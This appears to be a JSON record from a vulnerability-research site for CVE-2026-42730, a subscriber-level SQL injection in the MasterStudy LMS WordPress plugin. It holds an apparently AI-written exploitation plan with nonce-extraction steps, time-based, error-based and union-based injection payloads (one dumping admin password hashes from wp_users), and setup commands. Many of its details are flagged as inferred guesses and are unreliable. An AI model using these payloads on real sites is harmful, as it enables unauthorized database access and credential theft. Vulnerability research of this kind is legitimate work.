[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fjGg2OTydSofdWRoYnu67cEnZr04TucD8OBWx2Hev_mQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":20,"research_plan":32,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":36},"CVE-2026-42730","masterstudy-lms-wordpress-plugin-for-online-courses-and-education-authenticated-subscriber-sql-injection-2","MasterStudy LMS WordPress Plugin – for Online Courses and Education \u003C= 3.7.29 - Authenticated (Subscriber+) SQL Injection","The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.7.29 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","masterstudy-lms-learning-management-system",null,"\u003C=3.7.29","3.7.30","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-24 00:00:00","2026-05-26 19:29:39",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7bd3c653-249c-42b1-8af7-beac4ac3dd30?source=api-prod",3,[22,23,24,25,26,27,28,29],"_core\u002Fassets\u002Fcss\u002Faccount\u002Fmy-certificates.css","_core\u002Fassets\u002Fcss\u002Fcomponents\u002Fdrawer.css","_core\u002Fassets\u002Fcss\u002Fcourse-player\u002Fmain.css","_core\u002Fassets\u002Fcss\u002Fcourse-player\u002Fnavigation.css","_core\u002Fassets\u002Ficons\u002Fstyle.css","_core\u002Fassets\u002Fjs\u002Fadmin\u002Fsortable_menu.js","_core\u002Finit.php","_core\u002Flibraries\u002Fcompatibility\u002Fnotices.php","researched",false,"This research plan targets **CVE-2026-42730**, a Subscriber-level SQL Injection vulnerability in the MasterStudy LMS WordPress Plugin (\u003C= 3.7.29).\n\n### 1. Vulnerability Summary\nThe vulnerability exists in the AJAX handling logic of MasterStudy LMS. Authenticated users with Subscriber-level permissions can trigger specific AJAX actions that perform database queries without proper parameterization via `$wpdb->prepare()` or sufficient escaping. Specifically, parameters related to pagination, sorting, or filtering in the student dashboard (like \"My Courses\" or \"My Certificates\") are interpolated directly into SQL strings.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `stm_lms_get_my_certificates` (Inferred from `_core\u002Fassets\u002Fcss\u002Faccount\u002Fmy-certificates.css` and standard plugin patterns) or `stm_lms_get_user_courses`.\n*   **Vulnerable Parameter:** `offset` or `page` (Inferred).\n*   **Authentication:** Subscriber or higher.\n*   **Preconditions:** The plugin must have its default pages generated (see `_core\u002Flibraries\u002Fcompatibility\u002Fnotices.php`, line 58) and the user should ideally be enrolled in at least one course to ensure the query returns results.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** `wp-admin\u002Fadmin-ajax.php` receives a request with `action=stm_lms_get_my_certificates`.\n2.  **Hook Registration:** `STM_LMS_Route::get_my_certificates` (or similar) is hooked to `wp_ajax_stm_lms_get_my_certificates`.\n3.  **Input Extraction:** The handler retrieves `$_POST['offset']` or `$_POST['page']`.\n4.  **Vulnerable Sink:** The value is used in a query like:\n    ```php\n    $offset = $_POST['offset'];\n    $wpdb->get_results(\"SELECT ... LIMIT $offset, 10\"); \u002F\u002F NO PREPARE()\n    ```\n5.  **Execution:** The attacker appends SQL via the `offset` parameter (e.g., `0; SELECT SLEEP(5)--`).\n\n### 4. Nonce Acquisition Strategy\nMasterStudy LMS typically localizes nonces into a JavaScript object named `stm_lms_vars` or `stmlms_ajax_data`.\n\n1.  **Identify Page:** The Student Dashboard page (usually `\u002Fuser-public-account\u002F`) contains the \"My Certificates\" or \"Enrolled Courses\" sections.\n2.  **Creation:** Ensure the page exists using WP-CLI:\n    `wp post create --post_type=page --post_title=\"User Account\" --post_name=user-public-account --post_status=publish --post_content='[stm_lms_user_account]'`\n3.  **Extraction:**\n    *   Navigate to the page as a Subscriber.\n    *   Execute JS: `browser_eval(\"stm_lms_vars.stm_lms_get_my_certificates\")` or `browser_eval(\"stmlms_ajax_data.nonce\")`.\n    *   If those fail, check `browser_eval(\"stm_lms_nonces\")`.\n\n### 5. Exploitation Strategy\nWe will use a time-based blind SQL injection payload to verify the vulnerability.\n\n**Request Details:**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `action`: `stm_lms_get_my_certificates` (or `stm_lms_get_user_courses` if certificates are empty)\n    *   `nonce`: `[EXTRACTED_NONCE]`\n    *   `offset`: `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n\n**Payload Variations:**\n1.  **Error-Based:** `offset=1 AND updatexml(1,concat(0x7e,(user()),0x7e),1)`\n2.  **Union-Based:** (If column count is known) `offset=1 UNION SELECT 1,2,3,user_pass,5... FROM wp_users WHERE ID=1`\n\n### 6. Test Data Setup\n1.  **Create Subscriber:**\n    `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n2.  **Install\u002FActivate Plugin:** (Assumed pre-installed)\n3.  **Generate Pages:** MasterStudy requires pages to be generated to function.\n    `wp eval \"stm_lms_generate_pages();\"` (Inferred function from `_core\u002Flibraries\u002Fcompatibility\u002Fnotices.php`).\n4.  **Create Course & Enroll:**\n    *   `wp post create --post_type=stm-courses --post_title=\"Test Course\" --post_status=publish`\n    *   `wp eval \"STM_LMS_Course::enrol_user(1, 2);\"` (Inferred: Post ID 1, User ID 2).\n\n### 7. Expected Results\n*   **Vulnerable Response:** The HTTP request to `admin-ajax.php` will take ~5 seconds to complete when the `SLEEP(5)` payload is used.\n*   **Successful Extraction:** If using error-based, the response body will contain `XPATH syntax error: '~admin~'`.\n\n### 8. Verification Steps\n1.  **Check Logs:** Verify `wp-content\u002Fdebug.log` if `WP_DEBUG` is on to see the mangled query.\n2.  **Database Check:** Use WP-CLI to verify the existence of the admin user we are trying to dump:\n    `wp user get 1 --fields=user_login,user_pass`\n3.  **Confirm Patch:** On version 3.7.30, the same request should return a standard AJAX response (likely `0` or `{\"success\":false}`) without the 5-second delay.\n\n### 9. Alternative Approaches\nIf `stm_lms_get_my_certificates` is not registered or protected:\n1.  **Target `stm_lms_get_user_courses`:** This is the most common list on the dashboard.\n2.  **Target `stm_lms_course_order`:** Used when reordering courses on the dashboard.\n3.  **Parameter Fuzzing:** If `offset` is sanitized, try `order`, `sort`, or `status` parameters within the same AJAX actions. Many MasterStudy handlers use these to build the `ORDER BY` clause, which is frequently unquoted.\n\n**JavaScript Variable to check for Nonces:**\n*   `stm_lms_vars`\n*   `stmlms_ajax_data`\n*   `masterstudy_lms_vars` (inferred from newer versions)","gemini-3-flash-preview","2026-06-04 21:31:05","2026-06-04 21:31:41",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","3.7.29","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmasterstudy-lms-learning-management-system\u002Ftags\u002F3.7.29","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmasterstudy-lms-learning-management-system.3.7.29.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmasterstudy-lms-learning-management-system\u002Ftags\u002F3.7.30","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmasterstudy-lms-learning-management-system.3.7.30.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmasterstudy-lms-learning-management-system\u002Ftags"]